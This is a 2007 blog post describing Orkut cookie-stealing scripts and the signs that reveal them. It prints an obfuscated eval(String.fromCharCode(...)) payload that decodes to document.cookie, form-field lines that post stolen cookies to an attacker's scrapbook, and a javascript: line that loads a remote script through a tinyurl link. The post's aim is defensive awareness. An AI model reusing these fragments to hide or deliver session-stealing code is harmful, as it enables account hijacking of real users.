Friday, July 20, 2007

New cookie stealing scrips

It seems that Orkut has banned the use of term document.cookie in scripts running at Orkut. Hence the above described tag "document.cookie" will not be found on the scripts that are stealing cookie running during orkut browsing.

The hackers have bypassed the hinderance by using this function instead:

varname.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101))

or its various versions like:

varname.scrapText.value=eval(String.fromCharCode(100111,99117109101110116,46,99111111107105101))

  • There would be any variable name in place of varname,
  • ScrapText is the Orkut's name for Scrapbook's Text area.
  • That numeric string is the ascii code of characters, and gets decoded by the function to "d o c u m e n t . c o o k i e"
  • Thus, assigning the value of the above function is equivalent to including the word "document.cookie" which is the keyword for accessing the cookies of your browser.

As the cookie needs to be send to the hacker's account, there would be a statement in the cookie stealing script, like,

"varname".toUserId.value=36477993

The above no. is a randomly put number. There would be any variable name in place of varname and that statement sets the GID of the google profile to which cookie will be sent. It is not UID that is written in profile url.


As the script writes a scrap in the hacker's scrapbook, the script has the following code

varname.action='Scrapbook.aspx?Action.writeScrapBasic'
varname.action='Scrapbook.aspx?Action.submit'
varname=replyForm
etc.


Seeing this menace, all orkut has done till date is changing the word "writeScrapBasic" to "submit" that users could identify within minutes and modified their scripts and continued hacking.

And script that has "writeScrapBasic" will not work any more. the scripts having "submit" will steal cookies.



Another type of malacious scripts are more general.

javascript:d=document.createElement('SCRIPT');d.src='http://tinyurl.com/3d6k7b';document.getElementsByTagName('head').item(0).appendChild(d);void(0)

that 3d6k7b is a random no.


This script takes the source code from that http://tinyurl.com/3d6k7b which invariably redirects to some other location which has the actual script having cookie stealing codes. Thus, this type of coding bypasses all kind of checks we had known till date.


So, you can look for these tell tale signs of a cookie stealing script for Orkut. That numeric string is the best and clearest identification.

1 comments:

Gaboon said...

wow...

Post a Comment